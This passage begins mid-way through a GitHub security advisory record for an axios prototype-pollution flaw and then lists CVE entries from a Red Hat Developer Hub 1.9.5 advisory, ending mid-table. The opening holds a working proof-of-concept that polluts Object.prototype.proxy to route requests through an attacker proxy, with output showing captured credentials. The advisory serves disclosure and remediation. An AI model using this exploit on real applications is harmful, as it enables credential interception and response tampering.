=\u003e proxyServer.listen(0, r));\nconst proxyPort = proxyServer.address().port;\n\n// Real target server\nconst realServer = http.createServer((req, res) =\u003e {\n  res.writeHead(200);\n  res.end(\u0027{\"data\":\"real\"}\u0027);\n});\nawait new Promise(r =\u003e realServer.listen(0, r));\nconst realPort = realServer.address().port;\n\n// Prototype pollution\nObject.prototype.proxy = { host: \u0027127.0.0.1\u0027, port: proxyPort, protocol: \u0027http\u0027 };\n\n// \"Safe\" request \u2014 goes through attacker\u0027s proxy\nconst resp = await axios.get(`http://127.0.0.1:${realPort}/api/secrets`, {\n  auth: { username: \u0027admin\u0027, password: \u0027SuperSecret123!\u0027 }\n});\n\nconsole.log(\u0027Response from:\u0027, resp.data.hijacked ? \u0027ATTACKER PROXY\u0027 : \u0027real server\u0027);\nconsole.log(\u0027Intercepted Authorization:\u0027, intercepted[0]?.authorization);\n// Output: Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh (= admin:SuperSecret123!)\n\ndelete Object.prototype.proxy;\nrealServer.close();\nproxyServer.close();\n```\n\n## Verified PoC Output\n\n```\n[1] Normal request (before pollution):\n    Response source: real server\n    response.data: {\"data\":\"from-real-server\"}\n    Proxy intercept count: 0\n\n[2] Prototype Pollution: Object.prototype.proxy\n    Set: Object.prototype.proxy = { host: \"127.0.0.1\", port: 50879 }\n\n[3] Request after pollution (same code, same URL):\n    Response source: ATTACKER PROXY!\n    response.data: {\"data\":\"from-attacker-proxy\",\"hijacked\":true}\n\n[4] Data intercepted by attacker\u0027s proxy:\n    Full URL: http://127.0.0.1:50878/api/secrets\n    Host: 127.0.0.1:50878\n    Authorization: Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh\n    All headers: {\n      \"accept\": \"application/json, text/plain, */*\",\n      \"user-agent\": \"axios/1.15.0\",\n      \"accept-encoding\": \"gzip, compress, deflate, br\",\n      \"host\": \"127.0.0.1:50878\",\n      \"authorization\": \"Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh\",\n      \"connection\": \"keep-alive\"\n    }\n\n[5] Attacker capabilities demonstrated:\n    \u2713 Full URL visible (including internal hostnames)\n    \u2713 Authorization header visible (Base64-encoded credentials)\n    \u2713 Can modify/forge response data\n    \u2713 Affects ALL axios HTTP requests (not just a single instance)\n    \u2713 No assertOptions constraints (unlike transformResponse gadget)\n```\n\n## Impact Analysis\n\n- **Full Credential Interception:** Every HTTP request\u0027s `Authorization` header, cookies, API keys, and request bodies are visible to the attacker\u0027s proxy in plaintext.\n- **Arbitrary Response Tampering:** The attacker can return any response data \u2014 no constraints like `transformResponse`\u0027s \"must return true\".\n- **Internal Network Reconnaissance:** The proxy sees all request URLs, revealing internal hostnames, ports, and API paths.\n- **Universal Scope:** Affects every axios HTTP request in the application, including all third-party libraries that use axios.\n- **Invisible Attack:** The developer has no indication that a proxy has been injected \u2014 requests complete normally with attacker-controlled responses.\n- **Bypass of 1.15.0 Fix:** The header sanitization patch in v1.15.0 (GHSA-fvcv-3m26-pcqx) does NOT address this vector.\n\n### Why This Is More Severe Than transformResponse (axios_26)\n\n| Dimension | transformResponse Gadget | **proxy Gadget** |\n|---|---|---|\n| Data access | `this.auth` + response data | **All headers, auth, body, URL, response** |\n| Response control | Must return `true` | **Arbitrary responses** |\n| Attack visibility | Response becomes `true` (suspicious) | **Normal-looking responses (invisible)** |\n| mergeConfig involvement | Goes through defaultToConfig2 | **Bypasses mergeConfig entirely** |\n\n## Recommended Fix\n\n### Fix 1: Use `hasOwnProperty` when reading security-sensitive config properties\n\n```javascript\n// In lib/adapters/http.js\nconst proxy = Object.prototype.hasOwnProperty.call(config, \u0027proxy\u0027) ? config.proxy : undefined;\nsetProxy(options, proxy, location);\n```\n\n### Fix 2: Enumerate all properties not in defaults and apply `hasOwnProperty`\n\nProperties not in defaults that are read by http.js and have security impact:\n- `config.proxy` \u2014 MITM\n- `config.socketPath` \u2014 Unix socket SSRF\n- `config.transport` \u2014 request hijack\n- `config.lookup` \u2014 DNS hijack\n- `config.beforeRedirect` \u2014 redirect manipulation\n- `config.httpAgent` / `config.httpsAgent` \u2014 agent injection\n\nAll should use `hasOwnProperty` checks.\n\n### Fix 3: Use null-prototype object for merged config\n\n```javascript\n// In lib/core/mergeConfig.js\nconst config = Object.create(null);\n```\n\n## Resources\n\n- [CWE-1321: Prototype Pollution](https://cwe.mitre.org/data/definitions/1321.html)\n- [CWE-441: Unintended Proxy](https://cwe.mitre.org/data/definitions/441.html)\n- [GHSA-fvcv-3m26-pcqx: Related PP Gadget in Axios (Fixed in 1.15.0)](https://github.com/advisories/GHSA-fvcv-3m26-pcqx)\n- [Axios GitHub Repository](https://github.com/axios/axios)\n\n## Timeline\n\n| Date | Event |\n|---|---|\n| 2026-04-16 | Vulnerability discovered during source code audit |\n| 2026-04-16 | PoC developed and verified \u2014 full MITM confirmed |\n| TBD | Report submitted to vendor via GitHub Security Advisory |",
  "id": "GHSA-35jp-ww65-95wh",
  "modified": "2026-06-12T19:25:11Z",
  "published": "2026-05-29T16:04:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44494"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-fvcv-3m26-pcqx"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/axios/axios"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "axios Vulnerable to Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`"
}

RHSA-2026:26234

Vulnerability from csaf_redhat - Published: 2026-06-16 09:33 - Updated: 2026-06-17 15:37

Summary

Red Hat Security Advisory: Red Hat Developer Hub 1.9.5 release.

Severity

Important

Notes

Topic: Red Hat Developer Hub 1.9.5 has been released.

Details: Red Hat Developer Hub (RHDH) is Red Hat's enterprise-grade, self-managed, customizable developer portal based on Backstage.io. RHDH is supported on OpenShift and other major Kubernetes clusters (AKS, EKS, GKE). The core features of RHDH include a single pane of glass, a centralized software catalog, self-service via golden path templates, and Tech Docs. RHDH is extensible by plugins.

Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

CVE-2026-6321

A flaw was found in fast-uri. A remote attacker could exploit this vulnerability by providing a specially crafted Uniform Resource Locator (URL) containing percent-encoded path separators and dot segments. Due to incorrect processing, fast-uri would decode these elements before proper normalization, leading to distinct URLs resolving to the same internal path. This could allow an attacker to bypass security policies that rely on path-based comparisons, potentially gaining unauthorized access to resources.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—

Threats

Impact Important

CVE-2026-6322

A flaw was found in fast-uri. A remote attacker could exploit this vulnerability by crafting a malicious Uniform Resource Identifier (URI) that contains percent-encoded authority delimiters. The fast-uri library incorrectly decodes these delimiters during normalization and then re-emits them as raw separators, which can change the URI's intended authority. This issue allows applications that perform host allowlist checks, redirect validation, or outbound request routing to be steered to a different authority than specified, potentially bypassing security controls.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE-140 - Improper Neutralization of Delimiters

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—

Threats

Impact Important

CVE-2026-9277

A flaw was found in the shell-quote component. The quote() function did not properly validate object-token inputs, allowing line terminators to pass unescaped into the output. A remote attacker could exploit this vulnerability by providing specially crafted input, which a POSIX shell would interpret as a command separator. This could lead to command injection, enabling the attacker to execute arbitrary code on the system.

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—

Threats

Impact Important

CVE-2026-24781

A flaw was found in vm2, an open-source virtual machine (VM) sandbox for Node.js. This vulnerability allows an attacker to escape the sandbox environment by exploiting the `inspect` function. Successful exploitation can lead to arbitrary code execution on the host system, compromising the integrity and confidentiality of the system.

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-653 - Improper Isolation or Compartmentalization

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—

Threats

Impact Important

CVE-2026-32281

A flaw was found in Go's `crypto/x509` package. A remote attacker could exploit this by presenting a specially crafted certificate chain containing a large number of policy mappings. This inefficient validation process consumes excessive resources, which can lead to a denial of service (DoS) for applications or systems performing certificate validation.

5.9 (Medium)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-1050 - Excessive Platform Resource Consumption within a Loop

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—	Workaround

Threats

Impact Moderate

CVE-2026-41242

A flaw was found in protobufjs, a JavaScript (JS) library used for compiling protobuf definitions. A remote attacker with low privileges can exploit this vulnerability by injecting arbitrary code into the "type" fields of protobuf definitions. This malicious code will then execute during the object decoding process, leading to arbitrary code execution and potentially full system compromise.

8.8 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE-94 - Improper Control of Generation of Code ('Code Injection')

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—

Threats

Impact Important

CVE-2026-41672

A flaw was found in xmldom and @xmldom/xmldom, a JavaScript module for parsing and serializing XML. This vulnerability allows an attacker to inject malicious content into XML comments. By doing so, the attacker can prematurely close a comment and insert unauthorized XML elements into the final output. This could lead to the manipulation of data within the XML document.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE-91 - XML Injection (aka Blind XPath Injection)

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—	Workaround

Threats

Impact Important

CVE-2026-41673

A flaw was found in the `xmldom` library, a JavaScript module for parsing XML documents. An attacker could exploit this vulnerability by providing a specially crafted, deeply nested XML document. This could lead to a Denial of Service (DoS) by causing the application to crash due to excessive recursion.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-776 - Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—	Workaround

Threats

Impact Important

CVE-2026-41674

A flaw was found in xmldom and @xmldom/xmldom, a JavaScript library for parsing and serializing XML. This vulnerability allows an attacker to inject arbitrary XML markup into a document due to improper handling of DocumentType node fields during serialization. By crafting malicious input, an attacker can cause the XML serializer to prematurely terminate the DOCTYPE declaration, enabling the insertion of unauthorized content. This could lead to information disclosure or, in certain configurations, the execution of arbitrary code.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE-91 - XML Injection (aka Blind XPath Injection)

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—

Threats

Impact Important

CVE-2026-41675

A flaw was found in xmldom. A remote attacker can exploit this vulnerability by providing specially crafted processing instruction data. Due to improper validation of the processing instruction closing sequence, the attacker can terminate the instruction prematurely and inject arbitrary XML nodes into the serialized output. This can lead to data manipulation and integrity issues within applications that process the affected XML.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE-91 - XML Injection (aka Blind XPath Injection)

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—	Workaround

Threats

Impact Important

CVE-2026-42033

A flaw was found in Axios, an HTTP client library. This vulnerability allows an attacker to exploit a prototype pollution issue if another part of the application has already polluted the Object.prototype. By doing so, the attacker can intercept and modify JSON responses or take control of the HTTP communication. This could lead to unauthorized access to sensitive information like user credentials and request details.

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—

Threats

Impact Important

CVE-2026-42035

A flaw was found in Axios, a software library for making network requests. A remote attacker can exploit a prototype pollution vulnerability to inject arbitrary HTTP headers into outgoing requests. This occurs when the application's core object definitions are manipulated, causing Axios to misinterpret data and include attacker-controlled headers in network communications. This could lead to unauthorized actions or data manipulation.

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—	Workaround

Threats

Impact Moderate

CVE-2026-42039

A flaw was found in Axios, a promise-based HTTP client for browsers and Node.js. This vulnerability occurs because the `toFormData` function recursively processes nested objects without a depth limit. A remote attacker can exploit this by sending deeply nested request data, which causes the Node.js process to crash due to a RangeError, leading to a potential Denial of Service (DoS) if the process crashes.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-770 - Allocation of Resources Without Limits or Throttling

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—

Threats

Impact Important

CVE-2026-42041

A flaw was found in Axios, a promise-based HTTP client. This vulnerability, a Prototype Pollution "Gadget" attack, allows an attacker to manipulate the `Object.prototype.validateStatus` property. By polluting this property, all HTTP error responses (such as 401, 403, or 500) are silently treated as successful responses. This can lead to a complete bypass of application-level authentication and error handling, potentially granting unauthorized access.

8.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—

Threats

Impact Important

CVE-2026-42043

A flaw was found in Axios, a promise-based HTTP client. An attacker who can control the destination address of an Axios request can exploit this vulnerability. By using specific internal network addresses (within the 127.0.0.0/8 range, excluding 127.0.0.1), the attacker can completely bypass the NO_PROXY protection, potentially leading to unauthorized access or information disclosure within the network. This issue is an incomplete fix for a previous vulnerability.

7.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

CWE-918 - Server-Side Request Forgery (SSRF)

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—

Threats

Impact Important

CVE-2026-42044

A flaw was found in Axios, a widely used HTTP client. This vulnerability, known as a Prototype Pollution "Gadget" attack, allows a remote attacker to subtly alter JSON API responses. By manipulating a specific function, an attacker can selectively modify data within these responses. This could lead to significant security breaches, including unauthorized privilege escalation, fraudulent balance manipulation, or bypassing critical authorization checks.

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—	Workaround

Threats

Impact Important

CVE-2026-44293

A flaw was found in protobufjs, a library used to compile protobuf definitions into JavaScript functions. A remote attacker could exploit this vulnerability by providing a crafted descriptor that includes a non-string default value for a bytes field. This could lead to the generation of an unsafe expression within the toObject conversion function, ultimately allowing the attacker to execute arbitrary code.

7.1 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H

CWE-94 - Improper Control of Generation of Code ('Code Injection')

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—	Workaround

Threats

Impact Important

CVE-2026-44486

A flaw was found in Axios, a promise-based HTTP client, specifically in its Node.js HTTP adapter. When Axios is configured to use an authenticated proxy and follows a redirect, it may inadvertently send the Proxy-Authorization header, containing proxy credentials, to the redirect target. This can lead to the disclosure of sensitive proxy credentials to an unintended remote server.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE-201 - Insertion of Sensitive Information Into Sent Data

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—	Workaround

Threats

Impact Important

CVE-2026-44487

A flaw was found in Axios. During specific proxy-to-direct redirect flows in the Node.js HTTP adapter, a remote attacker could exploit this vulnerability. The Proxy-Authorization header, which contains proxy credentials and is intended only for the outbound proxy, may be forwarded to the final redirected origin. This can lead to the disclosure of sensitive proxy credentials to an unintended third party.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE-201 - Insertion of Sensitive Information Into Sent Data

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
